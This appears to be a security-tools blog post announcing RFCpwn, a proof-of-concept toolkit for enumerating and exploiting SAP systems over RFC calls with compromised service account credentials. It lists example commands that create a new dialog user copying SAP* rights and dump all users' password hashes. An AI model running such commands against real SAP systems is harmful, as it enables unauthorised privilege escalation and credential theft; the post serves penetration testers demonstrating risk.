Home Kali Linux RFCpwn : An Enumeration & Exploitation Toolkit Using RFC Calls To SAP

Kali Linux

RFCpwn : An Enumeration & Exploitation Toolkit Using RFC Calls To SAP

January 8, 2020

RFCpwn is an SAP enumeration and exploitation toolkit using SAP RFC calls. This is a toolkit for demonstrating the impact of compromised service accounts. This PoC is not for use in production environments, no guarantee of stability or support.

It relies on the pyrfc and the libraries provided by SAP in: https://github.com/SAP/PyRFC#installation

Also Read – AWS Report : Tool For Analyzing Amazon Resources

Examples

Ping – confirm connectivity

./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -ping

Copy a users rights into a new dialog user. If -copy is not specified SAP* is used.

./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -usercopy -user attacker -pw changeme1

Dump hashes from all users. option -exp for experimental bcode & passcode hashes.

./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -dump

Demo

Download

RFCpwn : An Enumeration & Exploitation Toolkit Using RFC Calls To SAP

APPLICATIONS

Exploring the Inextricable Link Between Digital Forensics and Cybersecurity

Tinfoil Chat – Onion Routed, Endpoint Secure Messaging System

One-Lin3r : Gives You One Liners That Aids In Penetration Testing Operations

FockCache : Minimalized Test Cache Poisoning

HOT NEWS

PrivExchange : Exchange Your Privileges For Domain Admin Privs By Abusing...

EVEN MORE NEWS

Bomber : Navigating Security Vulnerabilities In SBOMs

EmbedPayloadInPng : A Guide To Embedding And Extracting Encrypted Payloads In...

Exploit Street – Navigating The New Terrain Of Windows LPEs

POPULAR CATEGORY

Shreder : A Powerful Multi-Threaded SSH Protocol Password Bruteforce Tool

Dsiem : Security Event Correlation Engine For ELK Stack

QRLJacking : Hijack Services That Relies On QR Code Authentication